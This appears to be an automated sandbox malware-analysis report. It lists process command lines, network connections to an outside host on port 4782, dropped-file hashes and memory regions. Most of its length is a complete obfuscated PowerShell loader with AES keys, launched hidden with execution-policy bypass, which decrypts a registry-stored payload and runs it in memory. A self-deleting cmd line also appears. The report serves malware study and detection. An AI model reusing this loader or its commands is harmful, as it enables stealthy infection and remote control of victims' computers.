'')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ecd70d80-c62e-4226-bc55-de9460e27172}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2fe032de-ab54-4cb1-9edf-fa8856ca6027}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2656).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{da4eb554-3736-4161-9cfe-54b4c4bbe8d1}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{712cfe24-71b0-4334-a10e-3818da35c53b}
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f405f003-1c50-4b0a-b5bb-3e75beac0cbc}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{25858422-c4c2-4908-9a08-2b4d7b932eda}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2468371f-4996-4a2c-89cc-83db20afff50}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d2e8fd25-94fc-4467-a178-71c63d482411}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{40b72183-8e7a-49d9-9e75-c966d0c547ce}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2e4e3c33-3a48-4b2e-b5c3-b67a093182d3}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f62e8cdb-b511-4d32-b1e4-fe6d21f7f6b0}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{86c31b53-4071-4d3f-b3df-39bdea9c266a}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{50abcaee-ecb8-4880-853f-06694794bbaa}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2cead3ed-2f85-4cfa-81a4-13d4c72b3eca}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2504 -ip 2504
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c8bd73d1-5a15-4f0d-b38a-f24da5bfc179}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 472
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 2804 -ip 2804
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2804 -s 308
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{58b78572-f955-4b05-9bd9-b76de2e56cf3}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6060 -ip 6060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 356
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | tcp | |
| FR | 163.5.215.216:4782 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/552-4-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axpmm0rm.tmg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/552-13-0x0000020E608A0000-0x0000020E608C2000-memory.dmp
memory/552-14-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-15-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-16-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-17-0x0000020E48520000-0x0000020E48544000-memory.dmp
memory/552-19-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/552-18-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/552-20-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-21-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp
memory/552-23-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-22-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-24-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-25-0x0000020E60E10000-0x0000020E61860000-memory.dmp
memory/552-27-0x0000020E61860000-0x0000020E61906000-memory.dmp
memory/552-28-0x0000020E61910000-0x0000020E61966000-memory.dmp
memory/552-29-0x0000020E61970000-0x0000020E619C8000-memory.dmp
memory/552-33-0x0000020E60B10000-0x0000020E60B1A000-memory.dmp
memory/4672-35-0x0000000140000000-0x0000000140004000-memory.dmp
memory/552-30-0x0000020E48550000-0x0000020E48572000-memory.dmp
memory/4672-37-0x0000000140000000-0x0000000140004000-memory.dmp
memory/552-34-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-31-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/1996-38-0x0000000000400000-0x0000000000406000-memory.dmp
memory/1996-40-0x0000000000400000-0x0000000000406000-memory.dmp
memory/552-41-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-42-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
memory/2656-64-0x000001604E790000-0x000001604E7B4000-memory.dmp
memory/2656-66-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/2656-65-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-67-0x0000016066CD0000-0x0000016067254000-memory.dmp
memory/2656-68-0x000001606F720000-0x000001606FEEA000-memory.dmp
memory/2656-69-0x000001606FEF0000-0x000001607032E000-memory.dmp
memory/2656-70-0x0000016070330000-0x00000160703E2000-memory.dmp
memory/552-71-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/2656-72-0x00000160703E0000-0x0000016070402000-memory.dmp
memory/2656-73-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-81-0x00000160676A0000-0x00000160676F0000-memory.dmp
memory/2656-82-0x00000160677B0000-0x0000016067862000-memory.dmp
memory/2656-83-0x0000016067A40000-0x0000016067C02000-memory.dmp
memory/552-92-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/2656-93-0x00000160676F0000-0x000001606772C000-memory.dmp
memory/2656-94-0x0000016067650000-0x000001606769E000-memory.dmp
memory/2656-95-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-96-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/2656-97-0x0000016067730000-0x0000016067766000-memory.dmp
memory/1528-98-0x0000000140000000-0x0000000140028000-memory.dmp
memory/1528-99-0x0000000140000000-0x0000000140028000-memory.dmp
memory/1528-101-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/1528-100-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/1528-102-0x0000000140000000-0x0000000140028000-memory.dmp
memory/648-113-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1012-118-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/780-122-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1084-129-0x000001E20D8B0000-0x000001E20D8D7000-memory.dmp
memory/1200-140-0x000001796BE90000-0x000001796BEB7000-memory.dmp
memory/1200-141-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1092-138-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1092-137-0x0000016EC9740000-0x0000016EC9767000-memory.dmp
memory/1084-130-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/628-127-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/628-126-0x000001F51C730000-0x000001F51C757000-memory.dmp
memory/780-121-0x000001F30C9D0000-0x000001F30C9F7000-memory.dmp
memory/1012-117-0x0000021A78940000-0x0000021A78967000-memory.dmp
memory/704-115-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/448-111-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/448-110-0x000001E414B40000-0x000001E414B67000-memory.dmp
memory/704-109-0x000001FBD8460000-0x000001FBD8487000-memory.dmp
memory/648-105-0x00000249A1680000-0x00000249A16A7000-memory.dmp
memory/648-104-0x00000249A1650000-0x00000249A1672000-memory.dmp
memory/552-375-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.8dc8a17a-3e56-4183-9e3e-4c36840b2fd9.tmp.csv
| MD5 | 3c4a1965d4c56cdb2679767b2dc2348c |
| SHA1 | 7aaee80698d80220a1200ed29aa358348bee0294 |
| SHA256 | 9e6bb64cee9826e04d68be5587c5853ea02972685151abf465c7c8e6c133a1c2 |
| SHA512 | 28c111a484ae656868bf942ef4d5c1079b054814b7f844cfe3dcdc3477cc834865e377421440a81479c25ea96388e736dc0d98fcb3c4e92bf77f541ebe3c836f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de06e259-7074-4cc8-bc62-70e4c22a68fc.tmp.txt
| MD5 | 4a026e04c2b3faa82a8716ab632035b2 |
| SHA1 | 125f8ddb7cbe42b5681ea7c2b10ccf60e0ca8458 |
| SHA256 | c46d1ff5d3c424fa7dccb7a5751fd9f5c230e0fd336a6cc3a5eea4ccc4f08c0b |
| SHA512 | 8e78d984af962f0ea878153af3d2d7796aa5a56d211aecfa15c0eb1f621ac8421228d254e738d4f120f47d6819d4071c8fd8c7a9d0a700e7a58c0aa9ff640a30 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4ec0bf67-f5d0-40c1-b1eb-b0262db871e8.tmp.csv
| MD5 | 5c7d4424c0206de538c84512aff4acb8 |
| SHA1 | 5c999ebbb2c7bb6b6eea1539826c01e97baf0468 |
| SHA256 | 8b345ec2770271ec8174fb48e089144ef182d7e0163009e8930ad2f53bccd35f |
| SHA512 | d3192d582ad59d25646bc686b28db2a18b514179d8c2c970cca8a17f0bc4f72f2536a7a422c48a9769d630808c34f02c75432cfc0bea5682b877396e12adbb4e |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.15f745ea-299c-4809-9330-d8ecebf4f5da.tmp.txt
| MD5 | 5100664edb873952f210febdc9b061f0 |
